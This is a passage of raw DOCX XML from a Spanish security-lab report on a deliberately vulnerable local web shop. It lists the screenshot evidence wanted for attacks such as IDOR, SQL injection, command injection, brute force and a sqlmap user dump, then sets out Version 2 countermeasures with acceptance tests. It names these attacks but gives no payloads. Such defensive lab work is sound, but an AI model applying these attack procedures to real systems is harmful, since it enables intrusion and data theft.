            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>. No editar la captura de forma que se pierda la URL, el parámetro probado o la identificación del motor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E89BE7E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>12. Plan de evidencias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155DCCEE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Las capturas deben mostrar contexto </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>suficiente: comando ejecutado, dirección localhost, respuesta obtenida y fecha de la práctica. Cada figura debe tener número, título y fuente. Se recomienda no recortar en exceso la consola.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5499"/>
        <w:gridCol w:w="3175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="6DC49397" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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8B822E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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N.°</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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0DEFA2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Evidencia mínima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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AEFA48" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Nombre sugerido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="1904F587" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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5EF63A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549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18D7FA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Arquitectura lógica </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>del laboratorio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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22618B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01-arquitectura.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="333D540A" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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4C0253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5499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021286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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>compose</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> con servicios activos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175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8D9FEE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02-docker-ps.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="4F46D47E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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CDD0BC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549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CD929D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Escalamiento/IDOR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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7E7477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03-broken-access-control.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="7142DA67" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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52C8C0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5499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EC6BED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Actuator y CORS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175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F55ECE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04-misconfiguration.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="581A2ACB" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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C18BE4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549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208804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Dependency-Check.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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0EC14B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05-supply-chain.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="00883CC7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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891B2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5499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2A65B5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Passwords y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JWT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175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8C96F6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06-crypto.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="353E1866" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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9056DE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549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613B73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SQLi manual.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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325D9C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07-sqli-manual.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="1DB477CF" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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3ACE3C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5499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068AB9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Command injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175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049426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08-command-injection.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="0FC3F564" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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64F95F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549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BF7BB1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Carrito inseguro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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F90865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09-insecure-design.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="3897A392" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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A9C9FA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5499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B6750D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Fuerza bruta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175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B57007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10-auth-failures.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="0D6B93A7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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6AE883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549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66C694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Upload inseguro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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CDF34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11-upload.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="5235E458" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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C2543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5499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FE7300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Logs sensibles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175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8EA3FC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12-logging.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="707379DB" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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85F016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549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588051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Stacktrace.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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3F74DF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13-exception.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="2B7AA1BC" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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16C7AA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lastRenderedPageBreak/>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5499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F6770A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sqlmap detección.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175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41698A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14-sqlmap-deteccion.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="0C7583A3" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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9B7188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549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5F25C7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sqlmap dump.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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9260C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15-sqlmap-usuarios.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1347BF90" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428CA565" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Formato recomendado para cada pie de figura: “Figura N. Descripción de la evidencia. Fuente: elaboración propia a </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>partir de la ejecución del laboratorio local”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1E25E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45FF59" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>13. Contramedidas previstas para la Versión 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761D2F2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La V2 debe conservar la funcionalidad de la tienda, pero impedir que los procedimientos anteriores tengan éxito. La validación no consiste solo en que la </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">interfaz cambie: el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> debe aplicar </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>controles</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> aunque el cliente envíe peticiones manipuladas.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3572"/>
        <w:gridCol w:w="3345"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="5AC5E383" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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E6710B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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5"/>
              </w:rPr>
              <w:t>Hallazgo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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8B98C0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Control esperado V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3345" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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FCADB" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Prueba de aceptación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="61F8C171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B5FC04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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Rol controlado por cliente e IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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922715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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Spring Security, rol desde BD y propiedad del recurso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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F20D65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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>USER recibe 40</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>3 al acceder a administración o pedido ajeno.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="06E89EE2" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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21FFAB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Actuator/CORS/debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572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5A0102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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Actuator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> limitado, CORS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>whitelist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y mensajes genéricos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3345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E5AB46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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">No se exponen </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>heapdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>; origen no permitido es rechazado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="3AA6EA4E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400B8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5"/>
              </w:rPr>
              <w:t>Dependencia</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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3C6AA8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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Actualizar/eliminar Log4j vulnerable y </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>escaneo SCA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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D4AABD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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Dependency-Check</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> sin CVE crítico conocido del componente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="49636889" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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777D6A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Passwords/JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572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13257E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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>BCrypt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>, secreto externo, expiración y validación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3345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9258BF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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">BD no contiene </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>passwords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> legibles; token inválido/expirado es rechazado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="40707E3F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AE1EBF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SQLi y command injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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DE4A1A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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Consultas </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">parametrizadas y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>APIs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Java sin </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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CD6A37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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> no detecta inyección; caracteres de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> no ejecutan comandos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="14A0C5CA" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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A80E8E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5"/>
              </w:rPr>
              <w:t>Carrito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inseguro</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572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433BFE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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Validar cantidad, stock y propiedad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3345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17A61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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Cantidad inválida recibe 400; carrito ajeno no es accesible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="799D2B75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D0953F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5"/>
              </w:rPr>
              <w:t>Fuerza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bruta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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FA7AF0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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Rate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>limit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y bloq</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>ueo temporal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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4B1624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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
